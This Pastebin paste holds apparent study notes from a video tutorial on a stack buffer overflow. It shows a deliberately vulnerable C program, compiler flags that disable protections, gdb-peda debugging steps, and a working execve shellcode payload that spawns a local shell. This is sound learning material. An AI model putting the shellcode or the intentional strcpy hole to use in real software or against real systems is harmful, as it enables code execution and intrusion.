API tools faq
paste
Combreal

bufferOverflowPixisTut

Combreal
Aug 6th, 2020
228
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 2.96 KB | None | 0 0
raw download clone embed print report
  1. #BOF pixis tut
  2. https://www.youtube.com/watch?v=V7Gdc32XRhA
  3.  
  4. #include <stdio.h>
  5. #include <stdlib.h>
  6. #include <string.h>
  7.  
  8. void func(char *arg)
  9. {
  10.     char buffer[32];
  11.     strcpy(buffer,arg);
  12.     printf("%s\n", buffer);
  13. }
  14.  
  15. int main(int argc, char *argv[])
  16. {
  17.     if(argc != 2) printf("binary \n");
  18.     else func(argv[1]);
  19.     return 0;
  20. }
  21.  
  22. gcc -m32 -fno-stack-protector -z execstack test.c -w -g -o test
  23. peda test
  24. r $(perl -e 'print "A"x100')
  25. --> seg fault
  26. disass main
  27. 0x08048471 <+0>:     push   ebp
  28.    0x08048472 <+1>:     mov    ebp,esp
  29.    0x08048474 <+3>:     and    esp,0xfffffff0
  30.    0x08048477 <+6>:     sub    esp,0x10
  31.    0x0804847a <+9>:     cmp    DWORD PTR [ebp+0x8],0x2
  32.    0x0804847e <+13>:    je     0x804848e <main+29>
  33.    0x08048480 <+15>:    mov    DWORD PTR [esp],0x8048540
  34.    0x08048487 <+22>:    call   0x8048330 <puts@plt>
  35.    0x0804848c <+27>:    jmp    0x804849e <main+45>
  36.    0x0804848e <+29>:    mov    eax,DWORD PTR [ebp+0xc]
  37.    0x08048491 <+32>:    add    eax,0x4
  38.    0x08048494 <+35>:    mov    eax,DWORD PTR [eax]
  39.    0x08048496 <+37>:    mov    DWORD PTR [esp],eax
  40.    0x08048499 <+40>:    call   0x804844c <func>
  41.    0x0804849e <+45>:    mov    eax,0x0
  42.    0x080484a3 <+50>:    leave
  43.    0x080484a4 <+51>:    ret
  44. disass func
  45. 0x0804844c <+0>:     push   ebp
  46.    0x0804844d <+1>:     mov    ebp,esp
  47.    0x0804844f <+3>:     sub    esp,0x38
  48.    0x08048452 <+6>:     mov    eax,DWORD PTR [ebp+0x8]
  49.    0x08048455 <+9>:     mov    DWORD PTR [esp+0x4],eax
  50.    0x08048459 <+13>:    lea    eax,[ebp-0x28]
  51.    0x0804845c <+16>:    mov    DWORD PTR [esp],eax
  52. => 0x0804845f <+19>:    call   0x8048320 <strcpy@plt>
  53.    0x08048464 <+24>:    lea    eax,[ebp-0x28]
  54.    0x08048467 <+27>:    mov    DWORD PTR [esp],eax
  55.    0x0804846a <+30>:    call   0x8048330 <puts@plt>
  56.    0x0804846f <+35>:    leave
  57.    0x08048470 <+36>:    ret
  58. b *0x0804844c #break 1ère ligne func
  59. b *0x0804845f #strcpy dans func
  60. r $(perl -e 'print "A"x100')
  61. x/xw $esp
  62.    0xbffffbec:     0x0804849e #0x0804849e est l'@ de retour qui deviendra $eip
  63. x/4i 0x0804849e
  64.    0x804849e <main+45>: mov    eax,0x0
  65.    0x80484a3 <main+50>: leave
  66.    0x80484a4 <main+51>: ret  #on retrouve cela dans disass main
  67.    0x80484a5:   nop  
  68. c
  69. dumpargs
  70.    arg[0]: 0xbffffbc0 --> 0x0
  71.    arg[1]: 0xbffffdd9 ('A' <repeats 100 times>)
  72. p/d  0xbffffbec-0xbffffbc0 #@ debut buffer - @sauvegarde EIP
  73. r $(perl -e 'print "A"x44 . "ABCD"')
  74. c
  75. c
  76.    Stopped reason: SIGSEGV
  77.    0x44434241 in ?? () #control du flux d'execution (1234)
  78. r $(perl -e 'print "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80" . "\x90"x(44-23) . "ABCD"')
  79. c
  80. c
  81.    Stopped reason: SIGSEGV
  82.    0x44434241 in ?? () #control du flux d'execution (1234)
  83. r $(perl -e 'print "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80" . "\x90"x(44-23) . "\xf0\xfb\xff\xbf"') #0xbffffbf0 @ où est stockée le contenu du buffer
  84. c
  85. c
  86. process 11897 is executing new program: /bin/dash
  87.  
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!